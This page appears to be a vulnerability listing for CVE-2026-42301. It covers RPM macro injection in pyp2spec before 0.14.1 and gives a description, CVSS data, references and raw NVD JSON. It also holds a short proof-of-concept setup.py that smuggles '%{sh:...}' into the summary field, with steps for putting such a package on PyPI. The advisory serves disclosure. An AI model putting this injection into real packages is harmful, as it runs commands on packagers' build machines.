CVE-2026-42301

Description

pyp2spec generates working Fedora RPM spec file for Python projects. Prior to version 0.14.1, pyp2spec was writing PyPI package metadata (e.g. the summary field) into the generated spec file without escaping RPM macro directives. When a packager then runs rpmbuild, those directives get evaluated, so a malicious package can execute arbitrary commands on the build machine. This issue has been patched in version 0.14.1.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

pyp2spec < 0.14.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept - Malicious setup.py
# Attacker creates a Python package with the following setup.py

from setuptools import setup

setup(
    name="evil_package",
    version="1.0.0",
    # Injecting RPM macro payload into the summary field
    # This macro executes a shell command when rpmbuild processes the spec
    summary="Useful library %{sh:touch /tmp/pwned_by_cve}",
    description="This package looks normal but contains a payload.",
    author="Attacker",
)

# Steps to reproduce:
# 1. Attacker uploads this package to PyPI.
# 2. Victim runs: pyp2spec evil_package
# 3. Victim runs: rpmbuild -bb evil_package.spec
# 4. Command 'touch /tmp/pwned_by_cve' is executed on the build machine.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42301
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42301
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42301/
[4] VulDB https://vuldb.com/cve/CVE-2026-42301
[5] https://github.com/befeleme/pyp2spec/releases/tag/v0.14.1
[6] https://github.com/befeleme/pyp2spec/security/advisories/GHSA-r35x-v8p8-xvhw

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42301", "sourceIdentifier": "[email protected]", "published": "2026-05-09T04:16:25.923", "lastModified": "2026-05-09T04:16:25.923", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "pyp2spec generates working Fedora RPM spec file for Python projects. Prior to version 0.14.1, pyp2spec was writing PyPI package metadata (e.g. the summary field) into the generated spec file without escaping RPM macro directives. When a packager then runs rpmbuild, those directives get evaluated, so a malicious package can execute arbitrary commands on the build machine. This issue has been patched in version 0.14.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/befeleme/pyp2spec/releases/tag/v0.14.1", "source": "[email protected]"}, {"url": "https://github.com/befeleme/pyp2spec/security/advisories/GHSA-r35x-v8p8-xvhw", "source": "[email protected]"}]}}